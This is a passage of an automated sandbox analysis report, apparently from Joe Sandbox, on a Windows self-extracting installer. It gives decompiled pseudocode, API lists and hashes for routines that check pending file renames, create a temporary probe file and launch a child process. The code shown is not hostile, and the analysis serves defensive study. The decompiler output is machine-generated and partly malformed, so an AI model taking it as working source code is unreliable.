                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3862032828
                                                                                                                                                                                                                                                • Opcode ID: 5ade734f13ccbb8eddfa2634286c2678c1b2e1826990d0d75e3180b2b5f907bf
                                                                                                                                                                                                                                                • Instruction ID: 5f1ebec936b0e85392f46c8554fc9708afd0438c1110acfb4efcfe733c7368ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade734f13ccbb8eddfa2634286c2678c1b2e1826990d0d75e3180b2b5f907bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1211047130060477E7209B269C49FEF366DEBC6323F001125BA46D31D1CE788E8A86A2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 563 5256d-5257d 564 52583-52589 563->564 565 52622-52627 call 524e0 563->565 567 525e8-52607 RegOpenKeyExA 564->567 568 5258b 564->568 573 52629-5262f 565->573 569 525e3-525e6 567->569 570 52609-52620 RegQueryInfoKeyA 567->570 572 52591-52595 568->572 568->573 569->573 575 525d1-525dd RegCloseKey 570->575 572->573 574 5259b-525ba RegOpenKeyExA 572->574 574->569 576 525bc-525cb RegQueryValueExA 574->576 575->569 576->575
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0005256D(signed int __ecx) {
                                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                                				int _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t31 = E000524E0(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t34 = _t13 - 1;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                                							if(_t24 == 0) {
                                                                                                                                                                                                                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                                								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							_t31 = _v8;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t31;
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00054096,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?), ref: 000525B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?,00054096), ref: 000525CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00051ED3,00000001,00000000,?,?,00054137,?,00054096), ref: 000525DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00054096,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?), ref: 000525FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00054096,00000000,00000000,00000000,00000000,?,00051ED3,00000001,00000000), ref: 0005261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 000525C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000525F5
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 000525A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: 7e47fa0ddbe1efdd399bbf0d9f72f5b42787e96bd6d855381e528b58b5b672f3
                                                                                                                                                                                                                                                • Instruction ID: facd9ea0a34186123a22a55d498ad3deb1ba5d470825e1c11fd5bf6d0ea7533b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e47fa0ddbe1efdd399bbf0d9f72f5b42787e96bd6d855381e528b58b5b672f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC118235A12228FBAB209B919C0DDFF7FBCEF027A3F504155BD08A2040DA304F48D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int* _t25;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed char _t41;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				E00057155();
                                                                                                                                                                                                                                                				_push(0x58);
                                                                                                                                                                                                                                                				_push(0x572b8);
                                                                                                                                                                                                                                                				E00057208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                                				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                                				_t53 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                                					if(0 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(0 != _t56) {
                                                                                                                                                                                                                                                						Sleep(0x3e8);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t58 = 1;
                                                                                                                                                                                                                                                						_t53 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_t67 =  *0x588b0 - _t58; // 0x2
                                                                                                                                                                                                                                                					if(_t67 != 0) {
                                                                                                                                                                                                                                                						__eflags =  *0x588b0; // 0x2
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							 *0x581e4 = _t58;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							 *0x588b0 = _t58;
                                                                                                                                                                                                                                                							_t37 = E00056C3F(0x510b8, 0x510c4); // executed
                                                                                                                                                                                                                                                							__eflags = _t37;
                                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                                								_t30 = 0xff;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(0x1f);
                                                                                                                                                                                                                                                						L00056FF4();
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						_t68 =  *0x588b0 - _t58; // 0x2
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_push(0x510b4);
                                                                                                                                                                                                                                                							_push(0x510ac);
                                                                                                                                                                                                                                                							L00057202();
                                                                                                                                                                                                                                                							 *0x588b0 = 2;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if(_t53 == 0) {
                                                                                                                                                                                                                                                							 *0x588ac = 0;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t71 =  *0x588b4;
                                                                                                                                                                                                                                                						if( *0x588b4 != 0 && E00057060(_t71, 0x588b4) != 0) {
                                                                                                                                                                                                                                                							_t60 =  *0x588b4; // 0x0
                                                                                                                                                                                                                                                							 *0x5a288(0, 2, 0);
                                                                                                                                                                                                                                                							 *_t60();
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                                						_t59 =  *_t25;
                                                                                                                                                                                                                                                						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							_t41 =  *_t59;
                                                                                                                                                                                                                                                							if(_t41 > 0x20) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							if(_t41 != 0) {
                                                                                                                                                                                                                                                								if(_t54 != 0) {
                                                                                                                                                                                                                                                									goto L32;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                                										_t59 = _t59 + 1;
                                                                                                                                                                                                                                                										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                										_t41 =  *_t59;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                								_t29 = 0xa;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push(_t29);
                                                                                                                                                                                                                                                							_t30 = E00052BFB(0x50000, 0, _t59); // executed
                                                                                                                                                                                                                                                							 *0x581e0 = _t30;
                                                                                                                                                                                                                                                							__eflags =  *0x581f8;
                                                                                                                                                                                                                                                							if( *0x581f8 == 0) {
                                                                                                                                                                                                                                                								exit(_t30); // executed
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags =  *0x581e4;
                                                                                                                                                                                                                                                							if( *0x581e4 == 0) {
                                                                                                                                                                                                                                                								__imp___cexit();
                                                                                                                                                                                                                                                								_t30 =  *0x581e0; // 0x80070002
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                                							goto L40;
                                                                                                                                                                                                                                                							L32:
                                                                                                                                                                                                                                                							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                                							if(_t41 == 0x22) {
                                                                                                                                                                                                                                                								__eflags = _t54;
                                                                                                                                                                                                                                                								_t15 = _t54 == 0;
                                                                                                                                                                                                                                                								__eflags = _t15;
                                                                                                                                                                                                                                                								_t54 = 0 | _t15;
                                                                                                                                                                                                                                                								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                                							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                                							__eflags = _t26;
                                                                                                                                                                                                                                                							if(_t26 != 0) {
                                                                                                                                                                                                                                                								_t59 = _t59 + 1;
                                                                                                                                                                                                                                                								__eflags = _t59;
                                                                                                                                                                                                                                                								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t59 = _t59 + 1;
                                                                                                                                                                                                                                                							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L40:
                                                                                                                                                                                                                                                					return E0005724D(_t30);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t58 = 1;
                                                                                                                                                                                                                                                				__eflags = 1;
                                                                                                                                                                                                                                                				goto L7;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x00056bcc
                                                                                                                                                                                                                                                0x00056bce
                                                                                                                                                                                                                                                0x00056bce
                                                                                                                                                                                                                                                0x00056bd1
                                                                                                                                                                                                                                                0x00056bd3
                                                                                                                                                                                                                                                0x00056bd3
                                                                                                                                                                                                                                                0x00056bd6
                                                                                                                                                                                                                                                0x00056bda
                                                                                                                                                                                                                                                0x00056be1
                                                                                                                                                                                                                                                0x00056be3
                                                                                                                                                                                                                                                0x00056be5
                                                                                                                                                                                                                                                0x00056be5
                                                                                                                                                                                                                                                0x00056be6
                                                                                                                                                                                                                                                0x00056be6
                                                                                                                                                                                                                                                0x00056be9
                                                                                                                                                                                                                                                0x00056bea
                                                                                                                                                                                                                                                0x00056bea
                                                                                                                                                                                                                                                0x00056b74
                                                                                                                                                                                                                                                0x00056c39
                                                                                                                                                                                                                                                0x00056c3e
                                                                                                                                                                                                                                                0x00056c3e
                                                                                                                                                                                                                                                0x00056abe
                                                                                                                                                                                                                                                0x00056abe
                                                                                                                                                                                                                                                0x00000000

APIs
  • Part of subcall function 00057155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00057182
  • Part of subcall function 00057155: GetCurrentProcessId.KERNEL32 ref: 00057191
  • Part of subcall function 00057155: GetCurrentThreadId.KERNEL32 ref: 0005719A
  • Part of subcall function 00057155: GetTickCount.KERNEL32 ref: 000571A3
  • Part of subcall function 00057155: QueryPerformanceCounter.KERNEL32(?), ref: 000571B8
• GetStartupInfoW.KERNEL32(?,000572B8,00000058), ref: 00056A7F
• Sleep.KERNEL32(000003E8), ref: 00056AB4
• _amsg_exit.MSVCRT ref: 00056AC9
• _initterm.MSVCRT ref: 00056B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00056B49
• exit.KERNELBASE ref: 00056BBF
• _ismbblead.MSVCRT ref: 00056BDA
Memory Dump Source
• Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 3e48443034216a41587359f86c90c73d517b980fa0f41dd2937d56f2c7a3a281
• Instruction ID: 834ae31b787c34cbc142bc7a94a2ced88f73a8015663f3026cdb2e0ee24d26c8
• Opcode Fuzzy Hash: 3e48443034216a41587359f86c90c73d517b980fa0f41dd2937d56f2c7a3a281
• Instruction Fuzzy Hash: 4741E430A047258BFB619B68D8057BF7BE4EB45723F94811AED41E7291CF7A4C89CB81
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 631 558c8-558d5 632 558d8-558dd 631->632 632->632 633 558df-558f1 LocalAlloc 632->633 634 558f3-55901 call 544b9 633->634 635 55919-55959 call 51680 call 5658a CreateFileA LocalFree 633->635 639 55906-55910 call 56285 634->639 635->639 645 5595b-5596c CloseHandle GetFileAttributesA 635->645 644 55912-55918 639->644 645->639 646 5596e-55970 645->646 646->639 647 55972-5597b 646->647 647->644
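C-Code - Quality: 95%
/* Decompiler output. __ecx is a path string. The roles of the helpers
 * E00051680 (copy) and E0005658A (append) are inferred from how they are
 * called; neither is named in the report. */
E000558C8(intOrPtr* __ecx) {
	void* _v8;
	intOrPtr _t6;
	void* _t10;
	void* _t12;
	void* _t14;
	signed char _t16;
	void* _t20;
	void* _t23;
	intOrPtr* _t27;
	CHAR* _t33;

	_push(__ecx);
	_t33 = __ecx;
	_t27 = __ecx;
	_t23 = __ecx + 1;
	/* Inlined strlen: walk to the terminating NUL. */
	do {
		_t6 =  *_t27;
		_t27 = _t27 + 1;
	} while (_t6 != 0);
	/* Buffer size: path length + 0x14 bytes of room for the file name. */
	_t36 = _t27 - _t23 + 0x14;
	/* 0x40 = LMEM_ZEROINIT (LPTR). */
	_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
	if(_t20 != 0) {
		E00051680(_t20, _t36, _t33);
		E0005658A(_t20, _t36, "TMP4351$.TMP");
		/* 0x40000000 = GENERIC_WRITE, 1 = CREATE_NEW,
		 * 0x4000080 = FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_NORMAL. */
		_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
		_v8 = _t10;
		LocalFree(_t20);
		_t12 = _v8;
		/* 0xffffffff = INVALID_HANDLE_VALUE: the file could not be created. */
		if(_t12 == 0xffffffff) {
			goto L4;
		} else {
			CloseHandle(_t12);
			_t16 = GetFileAttributesA(_t33); // executed
			/* 0xffffffff = INVALID_FILE_ATTRIBUTES, 0x10 = FILE_ATTRIBUTE_DIRECTORY:
			 * succeed only if the original path is an existing directory. */
			if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
				goto L4;
			} else {
				 *0x59124 = 0;
				_t14 = 1;
			}
		}
	} else {
		E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
		L4:
		 *0x59124 = E00056285();
		_t14 = 0;
	}
	return _t14;
}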














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000558E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-2139698323
                                                                                                                                                                                                                                                • Opcode ID: 3d5e3ae4edbcfe55741b86d04297fd838b5c1886b783b020cdc9efc17c2de667
                                                                                                                                                                                                                                                • Instruction ID: 5e6d4a1a3c437bea16c5ec171a2c01d626ab89281c0e41c50b29d83e06f0c1b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d5e3ae4edbcfe55741b86d04297fd838b5c1886b783b020cdc9efc17c2de667
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5113431700721ABE7201F7AAC0DBDB7E9DEF86363F100615F90AD31D1CE78980986A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 675 53fef-54010 676 54016-5403b CreateProcessA 675->676 677 5410a-5411a call 56ce0 675->677 678 540c4-54101 call 56285 GetLastError FormatMessageA call 544b9 676->678 679 54041-5406e WaitForSingleObject GetExitCodeProcess 676->679 691 54106 678->691 682 54091 call 5411b 679->682 683 54070-54077 679->683 690 54096-540b8 CloseHandle * 2 682->690 683->682 686 54079-5407b 683->686 686->682 689 5407d-54089 686->689 689->682 692 5408b 689->692 693 54108 690->693 694 540ba-540c0 690->694 691->693 692->682 693->677 694->693 695 540c2 694->695 695->691
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00053FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                				long _v528;
                                                                                                                                                                                                                                                				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                                                                				_t20 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                                                                				_t49 = 1;
                                                                                                                                                                                                                                                				_t22 = 0;
                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return E00056CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                                					 *0x59124 = E00056285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                                					_t45 = 0x4c4;
                                                                                                                                                                                                                                                					E000544B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					_t49 = 0;
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t22 = _t49;
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                                				_t44 = _v528;
                                                                                                                                                                                                                                                				_t53 =  *0x58a28; // 0x0
                                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                                					_t34 =  *0x59a2c; // 0x0
                                                                                                                                                                                                                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                                							 *0x59a2c = _t44;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E0005411B(_t34, _t44);
                                                                                                                                                                                                                                                				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                                				CloseHandle(_v544);
                                                                                                                                                                                                                                                				if(( *0x59a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00054033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00054049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0005405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0005409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000540A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000540DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000540E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
